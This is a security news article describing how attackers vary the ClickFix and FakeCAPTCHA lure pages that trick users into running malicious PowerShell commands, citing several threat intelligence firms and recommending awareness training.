The many variants of the ClickFix social engineering tactic
As new malware delivery campaigns using the ClickFix social engineering tactic are spotted nearly every month, it’s interesting to see how the various attackers are trying to refine the two main elements: the lure and the “instruction” page.
In the latest email campaigns documented by the Google Threat Intelligence Group, the suspected Russian threat actor tried to trick the targets into downloading malware by urging them to “solve” a fake CAPTCHA page and then press a combination of keys that will execute a malicious PowerShell command without them knowing or noticing.
While the FakeCAPTCHA variant of the ClickFix tactic is not unusual, this might be the first time attackers have tried to work around the aversion many users feel towards written-down, step by step instructions by showing this alternative layout:
Instructions that are easy to follow. (Source: GTIG)
The ClickFix / FakeCaptcha approach
ClickFix is a tactic aimed at delivering malware without involving a web browser or requiring users to manually execute a file, and it helps attackers avoid detection by email and endpoint security solutions.
A typical ClickFix attack flow looks like this:
1) The user is tricked into visiting a page that will show a fake alert or a fake CAPTCHA test
2) The page tells the user to press a “Fix it” button or check an “I’m not a robot” box and perform a set of actions (the “instructions”)
3) A malicious PowerShell command is downloaded and executed
This relatively new tactic was first spotted last year, when it took the form of fake error messages that promised to fix the problem (thus the name “ClickFix”):
The error message, with step-by-step instructions (Source: Proofpoint)
ClickFix variants
The initial campaigns weren’t targeted: the attackers were trying to deliver infostealers to as many users as possible. Later, when other threat actors started using the tactic, we started witnessing many variations:
Malicious websites using the ClickFix / FakeCaptcha tactic (Source: Sekoia)
Attackers impersonating Samsara (Source: Proofpoint)
Fake Google Meet video conference page with malicious ClickFix pop-up (Source: Sekoia)
Email warning about “important security update” (Source: Proofpoint)
In time, attackers tried the same trick with macOS and Linux users.
In a campaign aimed at tech-savvy experts, the (Linux-using) targets were urged to install a CPU update (Source: DataDog)
According to Group-IB, the number of domains hosting pages with ClickFix content is consistently rising.
And while there are tech-focused protections organizations can implement to prevent this tactic from being successful, the social engineering aspect is primarily fought with security awareness training.
Subscribe to our breaking news e-mail alert to never miss out on the latest breaches, vulnerabilities and cybersecurity threats. Subscribe here!